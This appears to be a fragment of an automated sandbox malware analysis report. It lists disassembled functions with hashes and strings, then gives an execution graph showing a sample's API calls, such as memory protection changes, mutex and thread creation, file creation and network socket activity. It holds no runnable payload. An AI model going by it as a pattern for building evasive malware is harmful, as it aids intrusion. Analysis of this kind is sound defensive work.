                                                          • Instruction Fuzzy Hash: 8590022164140812E1407158C4187070006D7D0601F55C022A0424554DC6168A6567B5
                                                          Function 010635C0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                          • Instruction ID: de9d99b20610e14d02c56afc1bb0be627980926157333f03cc5df5aab0985d0f
                                                          • Opcode Fuzzy Hash: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                          • Instruction Fuzzy Hash: B7900231A0550412E10071588518706100597D0201F65C422A0824568DC7958A5166B6
                                                          Function 010639B0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                          • Instruction ID: 47db6235e42f3649182fe71f096440e10a50cb57d36a7e30bcc7559e954a6442
                                                          • Opcode Fuzzy Hash: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                          • Instruction Fuzzy Hash: B790022164545112E150715C84086164005B7E0201F55C032A0C14594DC55589556335
                                                          Function 01063D10 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea88234336256f33c417a336603690c9e2ce98ec76da780e1ae25df9b9cb5b5a
                                                          • Instruction ID: 1776a962592776eb44b0522fb2179cb50c525cd918bd73367d113fa4d0a0d99d
                                                          • Opcode Fuzzy Hash: ea88234336256f33c417a336603690c9e2ce98ec76da780e1ae25df9b9cb5b5a
                                                          • Instruction Fuzzy Hash: AA90023160240152A54072589808A4E410597E1302B95D426A0415554CC91489615335
                                                          Function 01063D70 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 557bf1acfbeabbbcc12cde061daa76e18049c7dd08574a084e8c5557ddd2f903
                                                          • Instruction ID: 45dd00e2a9df12fbda12d74cb276c2c191e3f28404d9e0cadf7ca29744b86ab3
                                                          • Opcode Fuzzy Hash: 557bf1acfbeabbbcc12cde061daa76e18049c7dd08574a084e8c5557ddd2f903
                                                          • Instruction Fuzzy Hash: 2390023560140412E51071589808646004697D0301F55D422A0824558DC65489A1A235
                                                          Function 01062C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 88d5b39d2a2274618ce46fc13efde132462e7ce9333afcc162b23dd6d63b7b9b
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Function 01062890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: f72695d306db84acef1a9ff49cdd4d6e633c74352e15a6769e1e6ff53aa8ecd8
                                                          • Instruction ID: ed07a0f822ee1976867ba5b7c54f31f447c9a4e6b7cca1072831b6a529b7be02
                                                          • Opcode Fuzzy Hash: f72695d306db84acef1a9ff49cdd4d6e633c74352e15a6769e1e6ff53aa8ecd8
                                                          • Instruction Fuzzy Hash: A451C3A2B00116BEDB21DB9C8C9097EFBF8BB49240B148269F5E5D7645D334DE509BE0
                                                          Function 010D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 3281313f3461557c06dcaec25a14c42d9e9bbea946a91aca1457a0675be2d9d6
                                                          • Instruction ID: 48d1b48265297b3e92c55aafa5229d76fea0d0478c0f0aa4b7f319adadb4ff1a
                                                          • Opcode Fuzzy Hash: 3281313f3461557c06dcaec25a14c42d9e9bbea946a91aca1457a0675be2d9d6
                                                          • Instruction Fuzzy Hash: 9D511671A00746AECB71DF9CC99097FBBF8EF44200B448499F9D6D7645EA74EA40C760
                                                          Function 01057630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01094742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010946FC
                                                          • ExecuteOptions, xrefs: 010946A0
                                                          • Execute=1, xrefs: 01094713
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01094725
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01094787
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01094655
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 1fc28e852e6758838fec64a4f39c28cda9504887855e49b450e67a1e7165e875
                                                          • Instruction ID: e71105037a0be61703b01e1805b4025433e421cc7a696d503c666a463bdfd643
                                                          • Opcode Fuzzy Hash: 1fc28e852e6758838fec64a4f39c28cda9504887855e49b450e67a1e7165e875
                                                          • Instruction Fuzzy Hash: C8510C3160021EAAEF51AAA8EC95FEE77ECFF18300F4400D9DA85A7181D7719E41DF61
                                                          Function 010F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: 4c2c7c0c243ccb2e654b97c7cee7183746f7048215303f5a479f7f30e6d7c3fd
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: CD022471508342AFD345DF18C495AAFBBE5EFC8700F04896DFA854B660DB32E945CB82
                                                          Function 0106B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 721eff7e79d749c3f495dec3fca96552ccf3a78f04f57fc4a215e313ce91551d
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: C381C0B0F0524A8EEF258E6CC8517FEBBE9BF45320F184199E9D1E7291C7388941CB51
                                                          Function 010D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 8f868d2bc68997fd58019c0286bb8d971ff60507b476b0c5c85b069ab9740d7c
                                                          • Instruction ID: 5981ecc56c05ed84e82438488df9770dac549c91e1a899e4a0e93952c556eaac
                                                          • Opcode Fuzzy Hash: 8f868d2bc68997fd58019c0286bb8d971ff60507b476b0c5c85b069ab9740d7c
                                                          • Instruction Fuzzy Hash: 3E21657AE00219ABDB11DF79CC50AFEBBF8EF64650F044156E995E7204E730DA418BA1
                                                          Function 0104F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 0109031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010902E7
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010902BD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: eb942337e1265301caf45290d5447296c47013be6fe2e7b611fe358de621fdb0
                                                          • Instruction ID: bd40fcdef8b8e8603ca8bb7e988f8e04e583d84c127cbe5fd2304cdc3449cc58
                                                          • Opcode Fuzzy Hash: eb942337e1265301caf45290d5447296c47013be6fe2e7b611fe358de621fdb0
                                                          • Instruction Fuzzy Hash: F5E1A0B06047429FEB65CF2CC894B5ABBE4BB48314F144AADF5E58B2D1D774D844CB42
                                                          Function 0105BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 01097BAC
                                                          • RTL: Resource at %p, xrefs: 01097B8E
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01097B7F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 6ab870f9da9b5f21673212a55109b358736aff2e56ae038b98e12a5879a9797f
                                                          • Instruction ID: 235d1bf9eefa929d499ab06d09a1c6ef04eefc231be13671a53b69f869bc2e79
                                                          • Opcode Fuzzy Hash: 6ab870f9da9b5f21673212a55109b358736aff2e56ae038b98e12a5879a9797f
                                                          • Instruction Fuzzy Hash: A941E3327007029FDB61DE29C850B6BB7E6EF98710F100A5DF9DA9B280DB71F8058B91
                                                          Function 0105B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 010972C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01097294
                                                          • RTL: Resource at %p, xrefs: 010972A3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: b1fd29d3aab43a3dce223c6850260e0121c9030067d37eafc469c61d37627de9
                                                          • Instruction ID: e561b53bfa97663e5bfc7299a16b2a24c08b48846ea40736c96fe4f6c02a8ae0
                                                          • Opcode Fuzzy Hash: b1fd29d3aab43a3dce223c6850260e0121c9030067d37eafc469c61d37627de9
                                                          • Instruction Fuzzy Hash: 2641F432710206ABDB21DE69CC41BAABBE6FF54710F104659FDD59B280DB21F8119BD1
                                                          Function 010D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 9a2fa3c0dab90068b64a9e17db91e816f3d27c8ff3d4f6338b34cea5c1ff4a8a
                                                          • Instruction ID: 3d43a2f6ea6018f1afb385d088e53a94cb5cac2d82127c623aa425ffa42fbaf5
                                                          • Opcode Fuzzy Hash: 9a2fa3c0dab90068b64a9e17db91e816f3d27c8ff3d4f6338b34cea5c1ff4a8a
                                                          • Instruction Fuzzy Hash: CF315472A003199FDB60DF2DCC40BEEB7F8EB54610F554596ED89E3244EF309A548BA0
                                                          Function 01067D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 53ef1f499b01e650ac53c88b03bc11584654f9fd4b51c3e6b15c5eabdcb7b429
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: D091B371E0021A9BEB64DF6DC880ABEBBFDEF44728F14855AE9D5E72C0D73489408751
                                                          Function 01029126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 2b769edde979e6e52f74786bb514d93603e171d72a0464c37d425480c7db6811
                                                          • Instruction ID: 7ee7dffd314e27f1a24b1d81502e5448390e77526cbdeceb467e7901815968c5
                                                          • Opcode Fuzzy Hash: 2b769edde979e6e52f74786bb514d93603e171d72a0464c37d425480c7db6811
                                                          • Instruction Fuzzy Hash: F3812971D002799BDB35DB54CC44BEEBAB8AF49754F0041EAEA59B7240D7709E84CFA0

                                                          Execution Graph

                                                          Execution Coverage:2.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.7%
                                                          Total number of Nodes:444
                                                          Total number of Limit Nodes:16
                                                          execution_graph 13768 869a22a 13769 869a25e 13768->13769 13770 86998c2 ObtainUserAgentString 13769->13770 13771 869a26b 13770->13771 13880 86a0aa9 13881 86a0aaf 13880->13881 13884 869b212 13881->13884 13883 86a0ac7 13885 869b237 13884->13885 13886 869b21b 13884->13886 13885->13883 13886->13885 13887 869b0c2 6 API calls 13886->13887 13887->13885 13577 869fbac 13578 869fbb1 13577->13578 13611 869fbb6 13578->13611 13612 8695b72 13578->13612 13580 869fc2c 13581 869fc85 13580->13581 13582 869fc69 13580->13582 13583 869fc54 13580->13583 13580->13611 13584 869dab2 NtProtectVirtualMemory 13581->13584 13587 869fc6e 13582->13587 13588 869fc80 13582->13588 13586 869dab2 NtProtectVirtualMemory 13583->13586 13585 869fc8d 13584->13585 13648 8697102 13585->13648 13590 869fc5c 13586->13590 13591 869dab2 NtProtectVirtualMemory 13587->13591 13588->13581 13592 869fc97 13588->13592 13634 8696ee2 13590->13634 13596 869fc76 13591->13596 13593 869fc9c 13592->13593 13594 869fcbe 13592->13594 13616 869dab2 13593->13616 13598 869fcd9 13594->13598 13599 869fcc7 13594->13599 13594->13611 13640 8696fc2 13596->13640 13603 869dab2 NtProtectVirtualMemory 13598->13603 13598->13611 13600 869dab2 NtProtectVirtualMemory 13599->13600 13602 869fccf 13600->13602 13658 86972f2 13602->13658 13606 869fce5 13603->13606 13676 8697712 13606->13676 13614 8695b93 13612->13614 13613 8695cce 13613->13580 13614->13613 13615 8695cb5 CreateMutexW 13614->13615 13615->13613 13617 869dadf 13616->13617 13625 869debc 13617->13625 13688 86938f2 13617->13688 13619 869de5c 13620 86938f2 NtProtectVirtualMemory 13619->13620 13621 869de7c 13620->13621 13622 86938f2 NtProtectVirtualMemory 13621->13622 13623 869de9c 13622->13623 13624 86938f2 NtProtectVirtualMemory 13623->13624 13624->13625 13626 8696de2 13625->13626 13628 8696df0 13626->13628 13627 8696ecd 13630 8693412 13627->13630 13628->13627 13713 869a382 13628->13713 13632 8693440 13630->13632 13631 8693473 13631->13611 13632->13631 13633 869344d CreateThread 13632->13633 13633->13611 13636 8696f06 13634->13636 13635 8696fa4 13635->13611 13636->13635 13637 86938f2 NtProtectVirtualMemory 13636->13637 13638 8696f9c 13637->13638 13639 869a382 ObtainUserAgentString 13638->13639 13639->13635 13643 8697016 13640->13643 13641 86970f0 13641->13611 13642 86970e8 13644 869a382 ObtainUserAgentString 13642->13644 13643->13641 13645 86938f2 NtProtectVirtualMemory 13643->13645 13646 86970bb 13643->13646 13644->13641 13645->13646 13646->13642 13647 86938f2 NtProtectVirtualMemory 13646->13647 13647->13642 13650 8697137 13648->13650 13649 86972d5 13649->13611 13650->13649 13651 86938f2 NtProtectVirtualMemory 13650->13651 13652 869728a 13651->13652 13653 86938f2 NtProtectVirtualMemory 13652->13653 13655 86972a9 13653->13655 13654 86972cd 13656 869a382 ObtainUserAgentString 13654->13656 13655->13654 13657 86938f2 NtProtectVirtualMemory 13655->13657 13656->13649 13657->13654 13660 8697349 13658->13660 13659 869749f 13661 86938f2 NtProtectVirtualMemory 13659->13661 13665 86974c3 13659->13665 13660->13659 13662 86938f2 NtProtectVirtualMemory 13660->13662 13661->13665 13663 8697480 13662->13663 13664 86938f2 NtProtectVirtualMemory 13663->13664 13664->13659 13666 86938f2 NtProtectVirtualMemory 13665->13666 13667 8697597 13665->13667 13666->13667 13668 86938f2 NtProtectVirtualMemory 13667->13668 13670 86975bf 13667->13670 13668->13670 13669 86976e1 13671 869a382 ObtainUserAgentString 13669->13671 13672 86938f2 NtProtectVirtualMemory 13670->13672 13673 86976b9 13670->13673 13674 86976e9 13671->13674 13672->13673 13673->13669 13675 86938f2 NtProtectVirtualMemory 13673->13675 13674->13611 13675->13669 13677 8697767 13676->13677 13678 86938f2 NtProtectVirtualMemory 13677->13678 13683 8697903 13677->13683 13679 86978e3 13678->13679 13680 86938f2 NtProtectVirtualMemory 13679->13680 13680->13683 13681 86979b7 13682 869a382 ObtainUserAgentString 13681->13682 13685 86979bf 13682->13685 13684 8697992 13683->13684 13686 86938f2 NtProtectVirtualMemory 13683->13686 13684->13681 13687 86938f2 NtProtectVirtualMemory 13684->13687 13685->13611 13686->13684 13687->13681 13689 8693987 13688->13689 13694 86939b2 13689->13694 13703 8694622 13689->13703 13691 8693c0c 13691->13619 13692 8693ba2 13693 869fe12 NtProtectVirtualMemory 13692->13693 13702 8693b5b 13693->13702 13694->13691 13694->13692 13695 8693ac5 13694->13695 13707 869fe12 13695->13707 13697 869fe12 NtProtectVirtualMemory 13697->13691 13698 8693ae3 13698->13691 13699 8693b3d 13698->13699 13700 869fe12 NtProtectVirtualMemory 13698->13700 13701 869fe12 NtProtectVirtualMemory 13699->13701 13700->13699 13701->13702 13702->13691 13702->13697 13705 869467a 13703->13705 13704 869467e 13704->13694 13705->13704 13706 869fe12 NtProtectVirtualMemory 13705->13706 13706->13705 13708 869fe45 NtProtectVirtualMemory 13707->13708 13711 869e942 13707->13711 13710 869fe70 13708->13710 13710->13698 13712 869e967 13711->13712 13712->13708 13714 869a3c7 13713->13714 13717 869a232 13714->13717 13716 869a438 13716->13627 13716->13716 13718 869a25e 13717->13718 13721 86998c2 13718->13721 13720 869a26b 13720->13716 13722 8699934 13721->13722 13723 86999a6 13722->13723 13724 8699995 ObtainUserAgentString 13722->13724 13723->13720 13724->13723 13772 869442e 13773 869445b 13772->13773 13781 86944c9 13772->13781 13774 869e232 NtCreateFile 13773->13774 13773->13781 13775 8694496 13774->13775 13776 86944c5 13775->13776 13777 8694082 NtCreateFile 13775->13777 13778 869e232 NtCreateFile 13776->13778 13776->13781 13779 86944b6 13777->13779 13778->13781 13779->13776 13780 8693f52 NtCreateFile 13779->13780 13780->13776 13932 869b72e 13933 869b788 connect 13932->13933 13934 869b76a 13932->13934 13934->13933 13804 8698ce2 13805 8698dd9 13804->13805 13806 8699022 13805->13806 13810 8698352 13805->13810 13808 8698f0d 13808->13806 13819 8698792 13808->13819 13811 869839e 13810->13811 13812 869858e 13811->13812 13813 86984ec 13811->13813 13815 8698595 13811->13815 13812->13808 13814 869e232 NtCreateFile 13813->13814 13817 86984ff 13814->13817 13815->13812 13816 869e232 NtCreateFile 13815->13816 13816->13812 13817->13812 13818 869e232 NtCreateFile 13817->13818 13818->13812 13820 86987e0 13819->13820 13821 869e232 NtCreateFile 13820->13821 13823 869890c 13821->13823 13822 8698af3 13822->13808 13823->13822 13824 8698352 NtCreateFile 13823->13824 13825 8698602 NtCreateFile 13823->13825 13824->13823 13825->13823 13826 869b2e4 13827 869b36f 13826->13827 13828 869b305 13826->13828 13828->13827 13830 869b0c2 13828->13830 13831 869b1f0 13830->13831 13832 869b0cb 13830->13832 13831->13827 13832->13831 13833 869ef82 6 API calls 13832->13833 13833->13831 13896 8695b66 13897 8695b6a 13896->13897 13898 8695cce 13897->13898 13899 8695cb5 CreateMutexW 13897->13899 13899->13898 13888 869b0b9 13889 869b0ed 13888->13889 13891 869b1f0 13888->13891 13890 869ef82 6 API calls 13889->13890 13889->13891 13890->13891 13834 86970fb 13836 8697137 13834->13836 13835 86972d5 13836->13835 13837 86938f2 NtProtectVirtualMemory 13836->13837 13838 869728a 13837->13838 13839 86938f2 NtProtectVirtualMemory 13838->13839 13842 86972a9 13839->13842 13840 86972cd 13841 869a382 ObtainUserAgentString 13840->13841 13841->13835 13842->13840 13843 86938f2 NtProtectVirtualMemory 13842->13843 13843->13840 13782 869d83a 13783 869d841 13782->13783 13784 869ef82 6 API calls 13783->13784 13785 869d8c5 13784->13785 13786 869d906 13785->13786 13787 869e232 NtCreateFile 13785->13787 13787->13786 13900 869ef7a 13901 869efb8 13900->13901 13902 869f022 13901->13902 13903 869b5b2 socket 13901->13903 13905 869f081 13901->13905 13903->13905 13904 869f134 13904->13902 13906 869b732 connect 13904->13906 13911 869f1b2 13904->13911 13905->13902 13905->13904 13907 869f117 getaddrinfo 13905->13907 13906->13911 13907->13904 13908 869b6b2 send 13910 869f729 13908->13910 13909 869f7f4 setsockopt recv 13909->13902 13910->13902 13910->13909 13911->13902 13911->13908 13955 8696fbf 13958 8697016 13955->13958 13956 86970f0 13957 86970e8 13959 869a382 ObtainUserAgentString 13957->13959 13958->13956 13960 86938f2 NtProtectVirtualMemory 13958->13960 13961 86970bb 13958->13961 13959->13956 13960->13961 13961->13957 13962 86938f2 NtProtectVirtualMemory 13961->13962 13962->13957 13892 86998be 13894 86998c3 13892->13894 13893 86999a6 13894->13893 13895 8699995 ObtainUserAgentString 13894->13895 13895->13893 13844 86930f1 13845 8693109 13844->13845 13846 86931d3 13844->13846 13847 8693012 6 API calls 13845->13847 13848 8693113 13847->13848 13848->13846 13849 869ef82 6 API calls 13848->13849 13849->13846 13935 86945f1 13936 869460e 13935->13936 13937 8694606 13935->13937 13938 8699662 6 API calls 13937->13938 13938->13936 13963 86a09b3 13964 86a09bd 13963->13964 13967 86956d2 13964->13967 13966 86a09e0 13968 8695704 13967->13968 13969 86956f7 13967->13969 13971 86956ff 13968->13971 13972 869572d 13968->13972 13974 8695737 13968->13974 13970 86930f2 6 API calls 13969->13970 13970->13971 13971->13966 13976 869b2c2 13972->13976 13974->13971 13975 869ef82 6 API calls 13974->13975 13975->13971 13977 869b2cb 13976->13977 13978 869b2df 13976->13978 13977->13978 13979 869b0c2 6 API calls 13977->13979 13978->13971 13979->13978 13725 869e232 13727 869e25c 13725->13727 13728 869e334 13725->13728 13726 869e410 NtCreateFile 13726->13728 13727->13726 13727->13728 13939 86a09f1 13940 86a09f7 13939->13940 13943 8695852 13940->13943 13942 86a0a0f 13944 8695865 13943->13944 13945 86958e4 13943->13945 13944->13945 13946 869587e 13944->13946 13948 8695887 13944->13948 13945->13942 13947 869b36f 13946->13947 13950 869b0c2 6 API calls 13946->13950 13947->13942 13948->13945 13949 8699662 6 API calls 13948->13949 13949->13945 13950->13947 13850 86972f4 13851 8697349 13850->13851 13852 869749f 13851->13852 13854 86938f2 NtProtectVirtualMemory 13851->13854 13853 86938f2 NtProtectVirtualMemory 13852->13853 13857 86974c3 13852->13857 13853->13857 13855 